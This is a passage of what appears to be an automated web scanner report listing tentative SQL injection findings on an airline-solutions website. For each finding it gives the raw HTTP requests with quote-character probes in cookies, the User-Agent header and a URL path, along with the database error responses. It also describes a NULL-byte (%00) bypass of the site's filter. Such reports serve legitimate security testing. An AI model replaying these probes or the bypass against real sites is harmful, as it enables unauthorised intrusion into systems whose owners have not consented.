Set-Cookie: exp_last_visit=1286321275; expires=Thu, 06-Oct-2011 03:19:59 GMT; path=/
Set-Cookie: exp_last_activity=1286353199; expires=Thu, 06-Oct-2011 03:19:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:20:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.6. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/ [exp_last_activity cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/

Issue detail

The exp_last_activity cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_activity cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956'; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:11:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321956''; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_revenue_accounting%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:11:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321956%27%27; expires=Thu, 06-Oct-2011 03:11:25 GMT; path=/
Set-Cookie: exp_last_activity=1286352685; expires=Thu, 06-Oct-2011 03:11:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A41%3A%22%2Fproducts_services%2Fenterprise_operations%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A2%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A4%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_web%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:11:36 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 21211


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...

2.7. http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/control_cost/ [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/enterprise_operations/control_cost/

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079'; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322346; expires=Thu, 06-Oct-2011 03:18:01 GMT; path=/
Set-Cookie: exp_last_activity=1286353081; expires=Thu, 06-Oct-2011 03:18:01 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A54%3A%22%2Fproducts_services%2Fenterprise_operations%2Fcontrol_cost%2F%22%3Bi%3A1%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A2%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A3%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A4%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 03:18:06 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 33703


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
<p title="Focus on events only when they deviate from the established plan - alerts are generated when these events require intervention or direct management">Managing by exception when events deviate from plan</p>
...[SNIP]...

Request 2

GET /home/products_services/enterprise_operations/control_cost/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322346; __utmb=178985382.2.10.1286295079''; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 03:18:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide
...[SNIP]...

2.8. http://www.sabreairlinesolutions.com/home/products_services/product/automated_exchange_and_refunds [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/automated_exchange_and_refunds

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:07:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/automated_exchange_and_refunds HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00''
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322645; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A3%3Bs%3A10%3A%22%2Fincludes%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:07:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322645; expires=Thu, 06-Oct-2011 02:08:07 GMT; path=/
Set-Cookie: exp_last_activity=1286348887; expires=Thu, 06-Oct-2011 02:08:07 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:08:59 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.9. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_acars_manager [exp_tracker cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_acars_manager

Issue detail

The exp_tracker cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_tracker cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00';

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:03:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00'';

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:03:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322611; expires=Thu, 06-Oct-2011 02:03:15 GMT; path=/
Set-Cookie: exp_last_activity=1286348595; expires=Thu, 06-Oct-2011 02:03:15 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_acars_manager%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A2%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 02:03:29 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 23471


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.10. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_control/ [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_control/

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response 1

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:47:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;

Response 2

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 01:48:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322045; expires=Thu, 06-Oct-2011 01:48:06 GMT; path=/
Set-Cookie: exp_last_activity=1286347686; expires=Thu, 06-Oct-2011 01:48:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A4%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 01:48:27 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 22738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.11. http://www.sabreairlinesolutions.com/home/products_services/product/sabre_aircentre_crew_manager/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.sabreairlinesolutions.com
Path:   /home/products_services/product/sabre_aircentre_crew_manager/

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /home/products_services/product/sabre_aircentre_crew_manager'/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:21:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 226
Connection: close
Content-Type: text/html

Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble
...[SNIP]...

Request 2

GET /home/products_services/product/sabre_aircentre_crew_manager''/ HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:21:53 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322049; expires=Thu, 06-Oct-2011 02:21:57 GMT; path=/
Set-Cookie: exp_last_activity=1286349716; expires=Thu, 06-Oct-2011 02:21:57 GMT; path=/
